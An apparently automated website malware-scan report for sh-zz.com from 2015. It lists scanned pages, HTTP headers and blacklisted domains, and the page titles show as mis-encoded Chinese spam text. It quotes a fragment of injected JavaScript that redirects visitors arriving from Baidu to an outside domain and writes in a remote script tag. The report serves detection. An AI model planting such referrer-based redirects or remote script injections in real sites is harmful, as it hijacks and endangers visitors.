New scan:

Malware Scanner report for sh-zz.com

Malicious/Suspicious/Total urls checked
0/7/28
7 pages have suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "sh-zz.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sh-zz.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://sh-zz.com/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:24 GMT
Accept-Ranges: bytes
ETag: "7a77b059c814d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 11294
Content-Location: http://sh-zz.com/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 22:26:32 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/index.html
200 OK
Content-Length: 11294
Content-Type: text/html
suspicious
Page code contains blacklisted domain: lyxdgs.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÉϺ£ÖÐÕéÖÆÒÂÓÐÏÞ¹«Ë¾</title> <meta name="keywords" content="ÉϺ£ÖÐÕéÖÆÒÂÓÐÏÞ¹«Ë¾" /> <meta name="description" content="ÉϺ£ÖÐÕéÖÆÒÂÓÐÏÞ¹«Ë¾ÊÇ·¨¹úÀÏÈËÍ·¹ú¼Ê·þÊ
...[4669 bytes skipped]...

http://Js.lwtzdec.com/huishou.js
200 OK
Content-Length: 1063
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: vip.hunlianyuan.com

...[596 bytes skipped]...
) > -1) {
window.opener.location.href = url
} else {
window.opener.location.replace(url)
}
}
};
var referer = document.referrer;
if (!referer) {
return
};
var rst = /https?\:\/\/([^\/]+)/i.exec(referer);
var host = rst ? rst[1] : 'unknown';
if (/baidu\.com$/i.test(host) && timeallow) {
var search = referer.substring(referer.indexOf('?'));
jump("http://vip.hunlianyuan.com/1.html");
return
}
})()
} catch(e) {}

document.write ('<script language="javascript" type="text/javascript" src="http://js.17meiliba.com/tan.js"></script>');

http://sh-zz.com/tj.js
200 OK
Content-Length: 0
Content-Type: application/x-javascript
clean
http://sh-zz.com/ht05uo311319/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:28 GMT
Accept-Ranges: bytes
ETag: "6c39bda6763d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10485
Content-Location: http://sh-zz.com/ht05uo311319/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 21:28:53 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/ht05uo311319/index.html
200 OK
Content-Length: 10485
Content-Type: text/html
clean
http://sh-zz.com/89szv6801066/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:30 GMT
Accept-Ranges: bytes
ETag: "6030a9b5773d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10288
Content-Location: http://sh-zz.com/89szv6801066/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 21:36:27 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/89szv6801066/index.html
200 OK
Content-Length: 10288
Content-Type: text/html
suspicious
Page code contains blacklisted domain: dadaoe.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¡¾´ÐÍ·³´öÏÓãµÄ×ö·¨¡¿ÈËÌå½âÆÊͼÎåÔàÁù¸­-dnf½ð±ÒÉÏÏÞ</title> <meta name="keywords" content="´ÐÍ·³´öÏÓãµÄ×ö·¨" /> <meta name="description" content="´ÐÍ·³´öÏÓãµÄ×
...[4364 bytes skipped]...

http://sh-zz.com/fcx2682259/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:31 GMT
Accept-Ranges: bytes
ETag: "c2bb80a7c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10164
Content-Location: http://sh-zz.com/fcx2682259/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:07:28 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/fcx2682259/index.html
200 OK
Content-Length: 10164
Content-Type: text/html
clean
http://sh-zz.com/y8jz68254/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:33 GMT
Accept-Ranges: bytes
ETag: "debd53f7c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 11171
Content-Location: http://sh-zz.com/y8jz68254/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:07:36 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/y8jz68254/index.html
200 OK
Content-Length: 11171
Content-Type: text/html
clean
http://sh-zz.com/uo4us3522199/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:34 GMT
Accept-Ranges: bytes
ETag: "423bbe407c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10308
Content-Location: http://sh-zz.com/uo4us3522199/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:08:59 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/uo4us3522199/index.html
200 OK
Content-Length: 10308
Content-Type: text/html
clean
http://sh-zz.com/ebs312198/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:36 GMT
Accept-Ranges: bytes
ETag: "24e388417c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10830
Content-Location: http://sh-zz.com/ebs312198/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:09:00 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/ebs312198/index.html
200 OK
Content-Length: 10830
Content-Type: text/html
suspicious
Page code contains blacklisted domain: sxjzm.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>»°¾çÒÕÊõÖÐÐÄ-d6¿Õ¼ä-wwwanquyelunlidianying</title> <meta name="keywords" content="»°¾çÒÕÊõÖÐÐÄ-d6¿Õ¼ä" /> <meta name="description" content="»°¾çÒÕÊõÖÐÐÄ-d6¿Õ
...[4462 bytes skipped]...

http://sh-zz.com/f9dt1599/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:38 GMT
Accept-Ranges: bytes
ETag: "1223d7977c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10941
Content-Location: http://sh-zz.com/f9dt1599/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:11:25 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/f9dt1599/index.html
200 OK
Content-Length: 10941
Content-Type: text/html
suspicious
Page code contains blacklisted domain: gzbishun.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>¸ÊÄϲØ×å×ÔÖÎÖݵØͼ|¿¨Í¨¶¯ÂþͼÏñ|ѸÀ× mac ÔƲ¥</title> <meta name="keywords" content="¸ÊÄϲØ×å×ÔÖÎÖݵØͼ" /> <meta name="description" content="¸ÊÄϲØ×å×ÔÖÎÖݵØÍ
...[4323 bytes skipped]...

http://sh-zz.com/tcv6kz3150/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:39 GMT
Accept-Ranges: bytes
ETag: "1e7853b57c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10134
Content-Location: http://sh-zz.com/tcv6kz3150/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:12:14 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/tcv6kz3150/index.html
200 OK
Content-Length: 10134
Content-Type: text/html
suspicious
Page code contains blacklisted domain: hzyuheng.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>ÇéÉ«ÎåÔÂÌì³ÉÈË»ùµØ-ûÕäϧµÄͼƬÌìʹ°®ÃÀÀöÓ¢ÎÄ×Öĸ</title> <meta name="keywords" content="ÇéÉ«ÎåÔÂÌì³ÉÈË»ùµØ" /> <meta name="description" content="ÇéÉ«ÎåÔÂÌì³ÉÈ
...[4402 bytes skipped]...

http://sh-zz.com/xc80p5249/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:41 GMT
Accept-Ranges: bytes
ETag: "6e21ffb57c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10331
Content-Location: http://sh-zz.com/xc80p5249/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:12:15 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/xc80p5249/index.html
200 OK
Content-Length: 10331
Content-Type: text/html
suspicious
Page code contains blacklisted domain: lyxdgs.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>°ÙºÏÕÅΰȨ|µ¾¹ÈÒÇÆ÷ÈËÓ붯ÎïÓ×Å®qovd</title> <meta name="keywords" content="°ÙºÏÕÅΰȨ" /> <meta name="description" content="°ÙºÏÕÅΰȨ£¨sh-zz.com£©¹ãÖÝÊмáÏèÃ
...[4314 bytes skipped]...

http://sh-zz.com/n5e4bwc1648/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:43 GMT
Accept-Ranges: bytes
ETag: "a27c9cb67c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 12085
Content-Location: http://sh-zz.com/n5e4bwc1648/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:12:16 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/n5e4bwc1648/index.html
200 OK
Content-Length: 12085
Content-Type: text/html
clean
http://sh-zz.com/ctyrk2847/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:44 GMT
Accept-Ranges: bytes
ETag: "5aaf51b77c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10511
Content-Location: http://sh-zz.com/ctyrk2847/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:12:18 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/ctyrk2847/index.html
200 OK
Content-Length: 10511
Content-Type: text/html
clean
http://sh-zz.com/cjsm69n887/
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:46 GMT
Accept-Ranges: bytes
ETag: "d293fecb7c3d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 10731
Content-Location: http://sh-zz.com/cjsm69n887/index.html
Content-Type: text/html
Last-Modified: Tue, 18 Nov 2014 22:12:52 GMT
X-Powered-By: ASP.NET
clean
http://sh-zz.com/cjsm69n887/index.html
200 OK
Content-Length: 10731
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sh-zz.com

Result:
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 00:05:24 GMT
Accept-Ranges: bytes
ETag: "7a77b059c814d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 11294
Content-Location: http://sh-zz.com/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 22:26:32 GMT
X-Powered-By: ASP.NET

...11294 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sh-zz.com
Referer: http://www.google.com/search?q=sh-zz.com

Result:
The result is similar to the first query. There are no suspicious redirects found.